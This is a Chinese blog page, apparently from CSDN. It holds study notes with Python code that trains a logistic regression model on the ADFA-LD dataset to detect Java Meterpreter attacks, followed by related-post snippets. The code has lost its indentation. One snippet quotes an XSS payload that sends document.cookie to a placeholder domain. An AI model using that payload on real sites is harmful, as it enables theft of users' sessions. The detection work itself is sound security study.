用java做溢出攻击实验,机器学习学习笔记--逻辑回归检测java溢出攻击

于 2021-03-10 10:01:49 发布
阅读量95 收藏
点赞数
文章标签: 用java做溢出攻击实验

#-*- coding:utf-8 -*-

import re

import matplotlib.pyplot as plt

import os

from sklearn.feature_extraction.text import CountVectorizer

from sklearn import cross_validation

import numpy as np

from sklearn.neural_network import MLPClassifier

from sklearn import linear_model,datasets

def load_one_file(filename):

x=[]

with open(filename) as f:

line=f.readline()

line=line.strip('\n')

return line

def load_adfa_training_files(rootdir):

x=[]

y=[]

list=os.listdir(rootdir)

for i in range(0,len(list)):

path=os.path.join(rootdir,list[i])

if os.path.isfile(path):

x.append(load_one_file(path))

print "Load file(%s)" % path

y.append(0)

return x,y

def dirlist(path,allfile):

filelist=os.listdir(path)

for filename in filelist:

filepath = os.path.join(path,filename)

if os.path.isdir(filepath):

dirlist(filepath,allfile)

else:

allfile.append(filepath)

return allfile

def load_adfa_java_files(rootdir):

x=[]

y=[]

allfile=dirlist(rootdir,[])

for file in allfile:

if re.match(r"/home/qin/code/python/web-ml/1book-master/data/ADFA-LD/Attack_Data_Master/Java_Meterpreter_\d+/UAD-Java-Meterpreter*",file):

print "Load file(%s)" % file

x.append(load_one_file(file))

y.append(1)

return x,y

if __name__ == "__main__":

x1,y1 = load_adfa_training_files("/home/qin/code/python/web-ml/1book-master/data/ADFA-LD/Training_Data_Master/")

x2,y2 = load_adfa_java_files("/home/qin/code/python/web-ml/1book-master/data/ADFA-LD/Attack_Data_Master/")

x=x1+x2

y=y1+y2

vectorizer = CountVectorizer(min_df=1)

x=vectorizer.fit_transform(x)

x=x.toarray()

mlp = MLPClassifier(hidden_layer_sizes=(150,50),max_iter=10,alpha=1e-4,

solver='sgd',verbose=10,tol=1e-4,random_state=1,learning_rate_init=.1)

logreg = linear_model.LogisticRegression(C=1e5)

score=cross_validation.cross_val_score(logreg,x,y,n_jobs=-1,cv=10)

print np.mean(score)

7af7bf11c34c?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

weixin_39819138
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java虚拟机栈溢出实战
qq_40931633的博客
04-24 888
Java虚拟机栈溢出实战
学习笔记(八):使用逻辑回归检测JAVA溢出攻击以及识别验证码
盐可
10-15 430
(1)检测JAVA溢出攻击 1.数据搜集:加载ADFA-LD正常样本数据,定义遍历目录下文件的函数,从攻击数据集中筛选和JAVA溢出攻击相关的数据,原理同(四) 2.特征化:与(四)一致,使用词集模型 3.训练样本 logreg = linear_model.LogisticRegression(C=1e5) 4.效果验证与(四)原理一致 (2)识别验证码 1.数据搜集:使用MNI...
java溢出攻击实验,Buffer Overflow: 堆栈溢出攻击实验
weixin_35763055的博客
03-10 469
前言这是CSAPP官网上的著名实验,通过注入汇编代码实现堆栈溢出攻击实验材料可到我的github仓库 https://github.com/Cheukyin/C... 下载linux默认开启ASLR,每次加载程序,变量地址都会不一样,所以若要关闭ASLR:sysctl -w kernel.randomize_va_space=0(赋值为2,即可打开ASLR)不过本实验的程序似乎经过特殊处理,不需...
Padding Oracle Attack(Java代码实现攻击)
hldfight
03-12 1087
之前看到过一个关于Apache Shiro的一个漏洞,它的Cookie使用AES-128-CBC模式进行加密,导致攻击者可以通过Padding Oracle攻击方式构造序列化数据进行反序列化攻击,这里可以复现该漏洞。但今天的主题不是Apache Shiro,这个以后会讲到。 今天主要讲下Padding Oracle攻击的原理,元旦放假一天,没事干,就自己用Java代码复现了下这...
通过自动化机器学习对抗Java恶意软件
weixin_33971205的博客
09-19 184
本文讲的是通过自动化机器学习对抗Java恶意软件, 最近几个月,黑客们又开始利用电子邮件展开大规模攻击,糟糕的是,这些恶意软件还使用了新技术来绕过杀毒软件的防护。但是,通过微软研究团队研发的自动化专家系统和机器学习模型,搭载Windows 10的电脑就可以及时地应对这些威胁。 黑客们总是不断改变他们的攻击方法和工具,专家们从多年来对恶意软件和网络犯罪行...
java学习笔记
02-11
### Java学习笔记知识点详解 #### 第一章:Linux简介与Java环境配置 ##### Linux与Java关系及计算机分类 - **Linux用途**:主要用于服务端,是进行服务端开发的首选操作系统之一。 - **计算机分类**: - **PC机*...
学习笔记-深入理解计算机系统-第一章.7z
05-24
《深入理解计算机系统》是计算机科学领域的一本经典教材,主要涵盖了计算机硬件、操作系统、编译器、存储...在markdown格式的学习笔记中,这些知识点可能会以清晰的段落、列表和代码示例的形式呈现,便于理解和复习。
JVM 学习笔记Java虚拟机)
最新发布
07-04
**JVM学习笔记Java虚拟机)** Java虚拟机(JVM)是Java语言的核心组成部分,它是Java程序运行的平台,负责解释和执行字节码。深入理解JVM对于优化Java应用程序性能至关重要。本笔记将从以下几个方面详细介绍JVM:...
JVM和性能优化学习思维笔记.rar
12-22
《JVM与性能优化:深度探索思维导图与学习笔记》 在Java世界里,JVM(Java Virtual Machine)是程序执行的核心,它负责解析字节码并将其转化为机器指令,使得Java具备“一次编写,到处运行”的特性。而性能优化则是...
JVM和性能优化学习思维笔记.rar_java
09-21
Java虚拟机(JVM)是Java程序运行的基础,它是一个抽象的计算机系统,负责执行Java字节码。在深入理解JVM与性能优化的过程中,我们需要关注以下几个关键知识点: 1. **JVM架构**:JVM主要由类加载器、运行时数据区...
Java实现逻辑回归算法(LogRegression)对iris数据集分类
10-14
使用逻辑回归对iris数据集进行分类,只选取了前2种花的部分样本。java实现。
java代码执行exe
weixin_33859665的博客
11-22 109
importjava.io.BufferedReader; importjava.io.File; importjava.io.IOException; importjava.io.InputStreamReader; publicclassPdf2SwfConvert{ publicstatic...
网站常用攻击技术详解
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会..
Python安装时import matplotlib.pyplot as plt报错
热门推荐
yang6464158的专栏
01-20 9万+
安装matplotlib的时候可能会出现输入import matplotlib.pyplot as plt出现报错的现象,如下图所示: >>> import matplotlib >>> import numpy >>> import scipy >>> import pyparsing >>> import matplotlib.pyplot as plt Traceback
java实现一个简单的机器学习和数据挖掘的demo
Shangri-La
08-06 1万+
因为最近忙着一个比赛,想用机器学习的方法来实现,因为我们用的是java,所以就用到了weka,weka的jar包可以去官网下载. 1,第一步先准备数据在项目里创建一个txt文件,然后把下面的数据放进去 @relation weather @attribute outlook {sunny, overcast, rainy} @attribute temperature numer
机器学习经典GA算法运用Java代码实现
qq_14945327的博客
06-24 488
机器学习经典GA算法运用Java代码实现
Web攻击检测机器学习深度实践
Coisini的博客
06-25 3576
一、概述 1.1 传统WAF的痛点 传统的WAF,依赖规则和黑白名单的方式来进行Web攻击检测。该方式过分依赖安全人员的知识广度,针对未知攻击类型无可奈何;另一方面即使是已知的攻击类型,由于正则表达式天生的局限性,以及shell、php等语言极其灵活的语法,理论上就是可以绕过,因此误拦和漏拦是天生存在的;而提高正则准确性的代价就是添加更多精细化正则,由此陷入一个永无止境打补丁的漩涡,拖累了整体性能...
java攻击_了解Java应用中的开发攻击
weixin_35715490的博客
02-12 610
注入式(Inject)攻击是一类非常常见的攻击方式,其基本特征是允许攻击者将不可信的动态内容注入到程序中,并将其执行,这就可能完全改变最初预计的执行过程,产生恶意效果。下面是几种主要的注入式攻击途径,原则上提供动态执行能力的语言特性,都需要地方发生注入攻击的可能。1. SQL注入攻击。一个典型的场景就是Web系统的用户登录功能,根据用户输入的用户名和密码,我们需要去后端数据库核实信息。假设应...
代码安全缺陷分析
java、c++、机器学习方向King
01-03 5081
安全缺陷种类 本次测试涵盖各类常见安全缺陷。根据缺陷形成的原因、被利用的可能性、造成的危害程度和解决的难度等因素进行综合考虑,可以将常见的安全缺陷分为八类: 1、输入验证与表示(Input Validation and Representation) 输入验证与表示问题通常是由特殊字符、编码和数字表示所引起的,这类问题的发生是由于对输入的信任所造成的。这些问题包括:缓冲区溢出、跨
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值